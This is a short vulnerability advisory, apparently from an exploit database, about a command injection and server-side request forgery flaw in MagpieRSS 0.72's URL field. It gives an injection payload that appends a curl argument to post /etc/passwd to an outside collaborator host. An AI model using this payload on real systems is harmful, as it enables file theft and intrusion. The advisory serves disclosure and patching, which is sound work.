vendor:
MagpieRSS
by:
bl4ckh4ck5
8.8
CVSS
HIGH
Command Injection and Server Side Request Forgery
78
CWE
Product Name: MagpieRSS
Affected Version From: MagpieRSS 0.72
Affected Version To: MagpieRSS 0.72
Patch Exists: YES
Related CWE: N/A
CPE: a:magpierss:magpierss:0.72
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Linux debian buster
2021
MagpieRSS 0.72 – ‘url’ Command Injection and Server Side Request Forgery
In MagpieRSS 0.72 on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php page, a command injection vulnerability exists in the RSS URL field when a https url is sent and the Parse RSS button is clicked. It is possible to read any file by sending a URL like 'https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'. It is also possible to request internal pages like 127.0.0.1, however it is restricted to https requests only. The vulnerability occurs in the file /extlib/Snoopy.class.inc on line 660.
Mitigation:
Upgrade to the latest version of MagpieRSS, or apply the patch provided by the vendor.